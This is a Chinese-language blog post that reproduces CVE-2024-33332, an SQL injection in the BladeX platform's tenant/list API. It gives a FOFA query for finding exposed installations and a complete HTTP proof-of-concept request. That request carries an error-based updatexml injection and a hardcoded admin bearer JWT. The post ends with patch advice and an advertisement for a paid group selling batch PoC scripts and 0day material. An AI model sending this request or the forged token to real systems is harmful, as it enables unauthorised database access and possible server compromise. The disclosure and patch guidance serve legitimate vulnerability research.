首页 > 数据库 >「漏洞复现」BladeX企业级开发平台 tenant/list SQL 注入漏洞复现(CVE-2024-33332)

「漏洞复现」BladeX企业级开发平台 tenant/list SQL 注入漏洞复现(CVE-2024-33332)

时间:2024-10-26 12:16:05浏览次数:3  
标签:blade list 企业级 漏洞 BladeX 复现 星球

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

BladeX是一款精心设计的微服务架构,提供 SpringCloud 全套解决方案,开源中国首批完美集成 SpringCloud Alibaba 系列组件的微服务架构,基于稳定生产的商业项目升级优化而来,更加贴近企业级的需求,追求企业开发更加高效。

0x03 漏洞威胁

BladeX企业级开发平台 /api/blade-system/tenant/list 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x04 漏洞环境

FOFA: 

body="https://bladex.vip/"

0x05 漏洞复现

PoC

GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
Connection: close

查询数据库版本

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

⼚商已发布了漏洞修复程序,请及时关注更新:

https://github.com/chillzhuang/blade-tool

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

如⾮必要,禁⽌公⽹访问该系统。

2023年4月份之后发布的版本已不存在此问题。漏洞修复文档路径:

https://www.kancloud.cn/smallchill/blade-safety/3234104

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

标签:blade,list,企业级,漏洞,BladeX,复现,星球
From: https://blog.csdn.net/qq_39894062/article/details/143250935

相关文章

  • 【博士论文复现】【阻抗建模、验证扫频法】光伏并网逆变器扫频与稳定性分析(包含锁相
    ......
  • 笑脸漏洞
    目前网络:mp和kali都是NAT模式,连的是手机热点在ifconfig得知本机ip为192.168.75.133,用nmap扫描网段nmap192.168.75.0/24nmap网关ip/24┌──(root㉿kali)-[/home/kali]└─#nmap192.168.75.0/24......
  • dedecms有什么漏洞
    DedeCMS存在的主要漏洞包括:1、SQL注入漏洞;2、跨站脚本攻击(XSS);3、文件包含漏洞;4、信息泄露;5、权限绕过。SQL注入漏洞可以让攻击者执行恶意SQL代码,获取敏感数据。跨站脚本攻击能插入恶意脚本到网页中,影响用户的数据和安全。文件包含漏洞可能让攻击者加载外部文件,执行恶意代码。......
  • 域内漏洞和利用
    实验目的与要求实验目的通过实验能够进行漏洞提权、复现、检测及防御。实验要求(1)认识近年来域内爆发的高危漏洞;(2)能够描述高危漏洞的背景、漏洞影响版本、漏洞原理;(3)能够利用漏洞提权,进行漏洞复现、检测及防御。实验原理与内容实验原理(1)简述提权及其分类提权(Pr......
  • 【漏洞复现】灵当CRM getOrderList Sql注入漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 【漏洞复现】华望云 会议管理平台 confmanger.inc 后台SQL注入漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 漏洞复现Jupyter Notebook未授权访问 getshell
    一、JupyterNotebook介绍JupyterNotebook(此前被称为IPythonnotebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行40多种编程语言。JupyterNotebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示......
  • 从梦想到现实:十年见证AI自动化漏洞修复的演变
    #1024程序员节|征文#2014年的梦想与构想回到2014年,那时的我还在不断学习、探索和思考,如何利用科技力量去创造一个更加安全和高效的数字世界。作为一名初出茅庐的技术爱好者,我深知互联网的发展离不开安全防护,而网站漏洞修复是其中至关重要的一环。于是,我萌生了一个大胆的想法......
  • CVE-2021-27905(Apache Solr SSRF)漏洞复现
    CVE-2021-27905(ApacheSolrSSRF)ApacheSolr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是ApacheLucene项目的开源企业搜索平台。该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,......
  • CVE-2014-4210Weblogic SSRF漏洞复现
    weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。影响版本:weblogic10.0.2-10.3.6版本一、漏洞复现第一步:进入漏洞环境并启动环境#启动cdvulhub/weblogic/ssrfdocker-composebuilddocker-composeup-d#访问http://......